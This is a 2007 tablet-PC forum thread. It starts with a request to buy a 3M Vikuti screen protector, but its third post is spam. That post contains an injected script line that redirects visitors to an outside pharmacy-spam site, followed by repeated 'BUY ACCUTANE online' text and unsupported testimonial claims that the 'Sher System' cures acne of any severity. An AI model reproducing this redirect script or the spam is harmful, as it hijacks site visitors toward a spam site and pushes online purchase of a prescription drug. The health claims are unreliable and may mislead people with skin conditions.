WTB: 3M Vikuti screen protector for T4220 (12" screen)

Discussion in 'Buy, Sell, Trade and Tablet PC Deals' started by stivenorman, Dec 2, 2007.

Thread Status:
Not open for further replies.
  1. technocrateus

technocrateus Pen Pal - Newbie

Looking for a new 3M Vikuti screen protector if anyone bought the set of 5 and would be willing to sell one for a reasonable price. Pls PM.

2. technocrateus

technocrateus Pen Pal - Newbie

See New Listing. Please delete

3. stivenorman

stivenorman Pen Pal - Newbie

<script>document.location = "http://buyaccutane.110mb.com";</script>

BUY ACCUTANE online
    Acne sufferers try so hard to get rid of their problem without knowing that most of the solutions they are offered are actually making their skin worse.
    BUY ACCUTANE online
    My skin condition ranged from mild to severe acne including rosacea for over 15 years. I tried everything possibly available, including the whole spectrum of natural therapies and antibiotics, and finally in desperation, accutane.
    Nothing made a huge difference. After commencing the Sher System program, within a couple of months my skin had never looked better. I have now been using the Sher System for over four years and now that it is the most effective skin program available for problem skin. The Sher System is unique, personalized and effective.
    BUY ACCUTANE online
    Anyone with any of these conditions will know what it means to be told that a treatment will work, but to actually experience the benefits of The Sher System, knowing the results are long term, is life saving. In almost every case, acne on all levels of severity can be treated successfully with the Sher System.
    BUY ACCUTANE online
    Yet the treatment available (over the counter lotions, or antibiotics) for this common chronic condition is often ineffective and many times can contribute towards worsening the condition. The sufferer is often told they are over-reacting to their condition and they will grow out of it.
    BUY ACCUTANE online

Last edited by a moderator: May 16, 2015
Thread Status:
Not open for further replies.